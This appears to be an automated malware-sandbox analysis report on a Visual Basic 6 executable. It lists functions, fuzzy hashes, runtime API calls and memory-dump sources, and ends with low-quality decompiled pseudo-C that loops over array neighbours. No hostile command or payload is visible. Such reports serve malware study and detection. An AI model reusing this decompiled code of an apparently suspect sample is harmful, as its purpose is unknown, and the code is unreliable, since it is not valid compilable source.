Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckFreeHresult
String ID:
API String ID: 444973724-0
Opcode ID: d9d2461bae26e300a6be13baabbf3109065032a57793341f905a1dc86a71ad05
Instruction ID: 8fc2fe219064943ff536383bbf2f997dee031144f5a3c4e1f0d6e080f28d2c41
Opcode Fuzzy Hash: d9d2461bae26e300a6be13baabbf3109065032a57793341f905a1dc86a71ad05
Instruction Fuzzy Hash: 33516371600215ABDB00AFB5CD89FAFBBACFF08701F104169F542E72E2DA7498458FA4

Uniqueness

Uniqueness Score: -1.00%

Function 00455E50, Relevance: 31.7, APIs: 21, Instructions: 184COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455EB5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455ED0
__vbaFreeObj.MSVBVM60 ref: 00455ED9
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455EED
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455F08
__vbaFreeObj.MSVBVM60 ref: 00455F11
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455F25
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455F40
__vbaFreeObj.MSVBVM60 ref: 00455F49
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455F5D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455F78
__vbaFreeObj.MSVBVM60 ref: 00455F81
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455F95
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455FB0
__vbaFreeObj.MSVBVM60 ref: 00455FB9
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455FCD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455FE8
__vbaFreeObj.MSVBVM60 ref: 00455FF7
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00456007
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00456022
__vbaFreeObj.MSVBVM60 ref: 0045602B

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckFreeHresult
String ID:
API String ID: 444973724-0
Opcode ID: 51b12b349e49639d7e7d27700370d25278afa59a5678d64185dfe26c478ef003
Instruction ID: 527317048a9a7fa5d8ec808ea15eb394e45876d74cd706c66dbd4438542503e1
Opcode Fuzzy Hash: 51b12b349e49639d7e7d27700370d25278afa59a5678d64185dfe26c478ef003
Instruction Fuzzy Hash: 4B516071600215EBDB10AFA5CD89FAFBBACFF08701F104169F542E71E1DB7499468BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00455A10, Relevance: 31.7, APIs: 21, Instructions: 184COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455A75
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455A90
__vbaFreeObj.MSVBVM60 ref: 00455A99
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455AAD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455AC8
__vbaFreeObj.MSVBVM60 ref: 00455AD1
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455AE5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455B00
__vbaFreeObj.MSVBVM60 ref: 00455B09
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455B1D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455B38
__vbaFreeObj.MSVBVM60 ref: 00455B41
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455B55
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455B70
__vbaFreeObj.MSVBVM60 ref: 00455B79
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455B8D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455BA8
__vbaFreeObj.MSVBVM60 ref: 00455BB7
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455BC7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455BE2
__vbaFreeObj.MSVBVM60 ref: 00455BEB

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckFreeHresult
String ID:
API String ID: 444973724-0
Opcode ID: 8f4a61840eda245fced1ecd0d4cb27a809ca194076322ae3bae018ec06dfe79f
Instruction ID: 4950f129d18b6f2022087dbe891d95769c1a129797b01a32a8a75f1c7ffa55c1
Opcode Fuzzy Hash: 8f4a61840eda245fced1ecd0d4cb27a809ca194076322ae3bae018ec06dfe79f
Instruction Fuzzy Hash: 7D514F71600215ABDB00AFA5CD89FAEBBACFF08705F104169F542E71E1DA7469468BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00455C30, Relevance: 31.7, APIs: 21, Instructions: 184COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455C95
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455CB0
__vbaFreeObj.MSVBVM60 ref: 00455CB9
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455CCD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455CE8
__vbaFreeObj.MSVBVM60 ref: 00455CF1
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455D05
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455D20
__vbaFreeObj.MSVBVM60 ref: 00455D29
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455D3D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455D58
__vbaFreeObj.MSVBVM60 ref: 00455D61
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455D75
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455D90
__vbaFreeObj.MSVBVM60 ref: 00455D99
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455DAD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455DC8
__vbaFreeObj.MSVBVM60 ref: 00455DD7
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455DE7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455E02
__vbaFreeObj.MSVBVM60 ref: 00455E0B

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckFreeHresult
String ID:
API String ID: 444973724-0
Opcode ID: befbb676c1482e341b6825807298d4305e4867c5a8d4c291df5f16d37289e33c
Instruction ID: 1985a8d53d69ce1abbd99889115ef90e49630f120c5e66a0b1a6dca3824dada3
Opcode Fuzzy Hash: befbb676c1482e341b6825807298d4305e4867c5a8d4c291df5f16d37289e33c
Instruction Fuzzy Hash: B8514E71600215ABDB10AFA5CD89FAFBBBCFF08705F104169F542E71E1CB7499468BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00456280, Relevance: 31.7, APIs: 21, Instructions: 184COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004562E5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00456300
__vbaFreeObj.MSVBVM60 ref: 00456309
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0045631D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00456338
__vbaFreeObj.MSVBVM60 ref: 00456341
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00456355
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00456370
__vbaFreeObj.MSVBVM60 ref: 00456379
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0045638D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 004563A8
__vbaFreeObj.MSVBVM60 ref: 004563B1
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004563C5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 004563E0
__vbaFreeObj.MSVBVM60 ref: 004563E9
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004563FD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00456418
__vbaFreeObj.MSVBVM60 ref: 00456427
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00456437
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00456452
__vbaFreeObj.MSVBVM60 ref: 0045645B

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckFreeHresult
String ID:
API String ID: 444973724-0
Opcode ID: 8a21e4b86901bd6660c69c7f7a09b2a64bbba971ad4d050507392a6d6966cf1c
Instruction ID: e56c3429eecf5780efca410d5b4977f88d0a16608922ae2cf5f7f755130f523a
Opcode Fuzzy Hash: 8a21e4b86901bd6660c69c7f7a09b2a64bbba971ad4d050507392a6d6966cf1c
Instruction Fuzzy Hash: 13514F71600215ABDB00AFA5CD89FAFBBACFF09705F104169F542E71E1CB749946CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004564A0, Relevance: 31.7, APIs: 21, Instructions: 184COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00456505
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00456520
__vbaFreeObj.MSVBVM60 ref: 00456529
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0045653D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00456558
__vbaFreeObj.MSVBVM60 ref: 00456561
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00456575
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00456590
__vbaFreeObj.MSVBVM60 ref: 00456599
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004565AD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 004565C8
__vbaFreeObj.MSVBVM60 ref: 004565D1
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004565E5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00456600
__vbaFreeObj.MSVBVM60 ref: 00456609
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0045661D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00456638
__vbaFreeObj.MSVBVM60 ref: 00456647
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00456657
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00456672
__vbaFreeObj.MSVBVM60 ref: 0045667B

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckFreeHresult
String ID:
API String ID: 444973724-0
Opcode ID: 250dc04a1687269055167ba674f47af5ea6f35b7cde4c2f9d0f93db8f7c89028
Instruction ID: 77776215979a66bfbeaac2d3ad5f6ef563a6675cd7650c2583d793c88bf7a496
Opcode Fuzzy Hash: 250dc04a1687269055167ba674f47af5ea6f35b7cde4c2f9d0f93db8f7c89028
Instruction Fuzzy Hash: F8516F71600215ABDB00AFA5CD89FAFBBACFF08705F104169F542E71E1DB749946CBA8

Uniqueness

Uniqueness Score: -1.00%

Function 004557F0, Relevance: 31.7, APIs: 21, Instructions: 184COMMON

Download Yara Rule

APIs

__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455855
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455870
__vbaFreeObj.MSVBVM60 ref: 00455879
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0045588D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 004558A8
__vbaFreeObj.MSVBVM60 ref: 004558B1
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004558C5
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 004558E0
__vbaFreeObj.MSVBVM60 ref: 004558E9
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004558FD
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455918
__vbaFreeObj.MSVBVM60 ref: 00455921
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 00455935
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455950
__vbaFreeObj.MSVBVM60 ref: 00455959
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 0045596D
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 00455988
__vbaFreeObj.MSVBVM60 ref: 00455997
__vbaObjSet.MSVBVM60(00000000,00000000), ref: 004559A7
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,00409A20,0000006C), ref: 004559C2
__vbaFreeObj.MSVBVM60 ref: 004559CB

Memory Dump Source

Source File: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckFreeHresult
String ID:
API String ID: 444973724-0
Opcode ID: 4b2d27aab8855ce756c369ead801f04adb405e82c47c69cb89abd6945ba2bbe7
Instruction ID: 47c247de7284a2898ede2b7627ebeb4883bfefa73f06ca2f1b5338ac299b6bab
Opcode Fuzzy Hash: 4b2d27aab8855ce756c369ead801f04adb405e82c47c69cb89abd6945ba2bbe7
Instruction Fuzzy Hash: 145150B1600215EBD700AFA5CD89FAFBBACFF08705F104169F542E71E1DB7499468BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00461740, Relevance: 31.7, APIs: 21, Instructions: 167COMMON

Download Yara Rule

APIs

__vbaNew2.MSVBVM60(00405960,0046C010,?,00000000,?), ref: 0046178A
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004617A9
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,0000013C), ref: 004617D2
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 004617DF
__vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004617F8
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00461811
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,00000144), ref: 00461837
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046183C
__vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00461855
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0046186E
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,000000E0), ref: 00461891
__vbaVarVargNofree.MSVBVM60(00000000,00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004618A7
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 004618B0
__vbaVarVargNofree.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 004618B9
__vbaI4Var.MSVBVM60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 004618BC
__vbaSetSystemError.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004618C8
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 004618D7
__vbaNew2.MSVBVM60(00405960,0046C010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 004618EC
__vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 00461905
__vbaHresultCheckObj.MSVBVM60(00000000,00000000,0040937C,0000013C), ref: 00461926
__vbaFreeObj.MSVBVM60(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00401E96), ref: 0046192F

Memory Dump Source

Source File: 00000000.00000002.661056537.0000000000461000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.660941226.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.660946211.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.661050174.0000000000460000.00000040.00020000.sdmp Download File
Associated: 00000000.00000002.661067161.000000000046C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661073801.000000000046E000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.661079197.0000000000470000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.661088372.0000000000484000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_boI88C399w.jbxd

Similarity

API ID: __vba$CheckFreeHresultNew2$NofreeVarg$ErrorSystem
String ID:
API String ID: 1759470632-0
Opcode ID: 269ed0b638d0cb8b022bf2a83f26ef2be6ba37be37cc313aa2a8fd35b4d8b7bf
Instruction ID: 616b7b741f69bc33f91faf8e9a59ebb0f3451d7cd1487092525343264a537fc4
Opcode Fuzzy Hash: 269ed0b638d0cb8b022bf2a83f26ef2be6ba37be37cc313aa2a8fd35b4d8b7bf
Instruction Fuzzy Hash: C2514074600204EBC710EFA5DD89EAABBACFF58740F144426F541F72A1E674A905CBA9

Uniqueness

Uniqueness Score: -1.00%

Function 00450ED0, Relevance: 30.4, APIs: 20, Instructions: 438
COMMON

Download Yara Rule

C-Code - Quality: 19%

			E00450ED0(void* __ebx, void* __edi, void* __esi, void* __fp0, signed int _a4) {
				signed int _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v64;
				intOrPtr _v80;
				signed int _v88;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed long long _v140;
				signed long long _v148;
				signed long long _v156;
				signed int _v160;
				signed int _t227;
				signed int _t230;
				signed int _t231;
				void* _t234;
				void* _t236;
				intOrPtr _t237;

				_t237 = _t236 - 0xc;
				 *[fs:0x0] = _t237;
				_v16 = _t237 - 0x88;
				_v12 = 0x401438;
				_t230 = _a4;
				_v8 = _t230 & 0x00000001;
				_t231 = _t230 & 0xfffffffe;
				_a4 = _t231;
				 *((intOrPtr*)( *_t231 + 4))(_t231, __edi, __esi, __ebx,  *[fs:0x0], 0x401e96, _t234);
				_v28 = 0;
				_v44 = 0;
				_v64 = 0;
				E00461600(__ebx, _t231, __esi);
				E00462140(__ebx, _t231, __esi, __fp0);
				_t227 =  *0x46c070; // 0x0
				_v80 = _t227 - 1;
				 *0x46c068 = 1;
				while(__esi <= _v80) {
					__eax =  *0x46c074; // 0x0
					_v88 = __eax;
					__eax = 1;
					 *0x46c06c = 1;
					while(__eax <= _v88) {
						__ecx =  *0x46c088; // 0x0
						__edx =  *(__ecx + 0x14);
						__ebx =  *(__ecx + 0x18);
						__eax = __eax -  *(__ecx + 0x14);
						__edx =  *(__ecx + 0x1c);
						_v100 = __eax;
						_v104 = __ebx;
						__eax - 1 = (__eax - 1) * __ebx;
						__edi = (__eax - 1) * __ebx -  *(__ecx + 0x1c);
						__edx =  *(__ecx + 0x20);
						__edi = (__eax - 1) * __ebx -  *(__ecx + 0x1c) + __esi;
						__eax = __eax + 1;
						__eax = __eax * __ebx;
						__ebx =  *(__ecx + 0x1c);
						__esi =  *(__ecx + 0x24);
						__eax = __eax -  *(__ecx + 0x1c);
						__ebx =  *0x46c068; // 0x0
						__eax = __eax + __ebx;
						__ebx =  *(__ecx + 0x1c);
						_v112 = __eax;
						_v104 = _v104 * _v100;
						__eax = _v104 * _v100 -  *(__ecx + 0x1c);
						__ebx =  *0x46c068; // 0x0
						__eax = _v104 * _v100 -  *(__ecx + 0x1c) + __ebx;
						_v108 = __edi;
						__edi =  *(__ecx + 0xc);
						_v116 = __eax;
						__eax - 1 = (__eax - 1) * __edx;
						__ebx = (__eax - 1) * __edx - __esi;
						_v120 = (__eax - 1) * __edx - __esi;
						__ebx = __eax + 1;
						__ebx = (__eax + 1) * __edx;
						__eax = _v120;
						__ebx = __ebx - __esi;
						__eax =  *(__edi + _v120 * 4);
						__eax =  *(__edi + _v120 * 4) +  *((intOrPtr*)(__edi + __ebx * 4));
						_v112 = _v112 - 1;
						(_v112 - 1) * __edx = (_v112 - 1) * __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__edi + ((_v112 - 1) * __edx - __esi) * 4));
						_v112 = _v112 + 1;
						(_v112 + 1) * __edx = (_v112 + 1) * __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__edi + ((_v112 + 1) * __edx - __esi) * 4));
						_v108 = _v108 - 1;
						(_v108 - 1) * __edx = (_v108 - 1) * __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__edi + ((_v108 - 1) * __edx - __esi) * 4));
						_v108 = _v108 + 1;
						(_v108 + 1) * __edx = (_v108 + 1) * __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__edi + ((_v108 + 1) * __edx - __esi) * 4));
						_v116 = _v116 * __edx;
						__ebx = _v116 * __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__edi + (_v116 * __edx - __esi) * 4));
						__ebx = _v112;
						__ebx = _v112 * __edx;
						__edx = __edx * _v108;
						__ebx = __ebx - __esi;
						__edx = __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__edi + __ebx * 4));
						__ebx =  *(__edi + __edx * 4);
						__eax = __eax +  *(__edi + __edx * 4);
						asm("cdq");
						__eax = __eax ^ __edx;
						 *0x46c078 = __eax;
						__eax =  *0x46c06c; // 0x0
						__ebx =  *(__ecx + 0x14);
						__eax = __eax -  *(__ecx + 0x14);
						__ebx =  *(__ecx + 0x18);
						_v100 = __eax;
						_v104 = __ebx;
						_t63 = __eax - 1; // -1
						__esi = _t63;
						__edx =  *(__ecx + 0x1c);
						__esi = _t63 * __ebx;
						_v124 = __edx;
						__esi = _t63 * __ebx - __edx;
						__edx =  *0x46c068; // 0x0
						__edi =  *(__ecx + 0xc);
						__esi = _t63 * __ebx - __edx + __edx;
						__eax = __eax + 1;
						__eax = __eax * __ebx;
						__ebx = _v124;
						__edx =  *(__ecx + 0x20);
						__eax = __eax - _v124;
						__ebx =  *0x46c068; // 0x0
						__eax = __eax + __ebx;
						__ebx = _v124;
						_v112 = __eax;
						_v104 = _v104 * _v100;
						__eax = _v104 * _v100 - _v124;
						__ebx =  *0x46c068; // 0x0
						__eax = _v104 * _v100 - _v124 + __ebx;
						_v108 = __esi;
						__esi =  *(__ecx + 0x24);
						_v116 = __eax;
						__eax - 1 = (__eax - 1) * __edx;
						__ebx = (__eax - 1) * __edx - __esi;
						_v128 = (__eax - 1) * __edx - __esi;
						__ebx = __eax + 1;
						__ebx = (__eax + 1) * __edx;
						__eax = _v128;
						__ebx = __ebx - __esi;
						__eax =  *(__edi + 4 + _v128 * 4);
						__eax =  *(__edi + 4 + _v128 * 4) +  *((intOrPtr*)(__edi + 4 + __ebx * 4));
						_v112 = _v112 - 1;
						(_v112 - 1) * __edx = (_v112 - 1) * __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__edi + 4 + ((_v112 - 1) * __edx - __esi) * 4));
						_v112 = _v112 + 1;
						(_v112 + 1) * __edx = (_v112 + 1) * __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__edi + 4 + ((_v112 + 1) * __edx - __esi) * 4));
						_v108 = _v108 - 1;
						(_v108 - 1) * __edx = (_v108 - 1) * __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__edi + 4 + ((_v108 - 1) * __edx - __esi) * 4));
						_v108 = _v108 + 1;
						(_v108 + 1) * __edx = (_v108 + 1) * __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__edi + 4 + ((_v108 + 1) * __edx - __esi) * 4));
						_v116 = _v116 * __edx;
						__ebx = _v116 * __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__edi + 4 + (_v116 * __edx - __esi) * 4));
						__ebx = _v112;
						__ebx = _v112 * __edx;
						__edx = __edx * _v108;
						__ebx = __ebx - __esi;
						__edx = __edx - __esi;
						__eax = __eax +  *((intOrPtr*)(__edi + 4 + __ebx * 4));
						__ebx =  *(__edi + 4 + __edx * 4);
						__edi =  *0x46c06c; // 0x0
						__eax = __eax +  *(__edi + 4 + __edx * 4);
						asm("cdq");
						__eax = __eax ^ __edx;
						 *0x46c07c = __eax;
						__ebx =  *(__ecx + 0x14);
						__eax =  *(__ecx + 0x18);
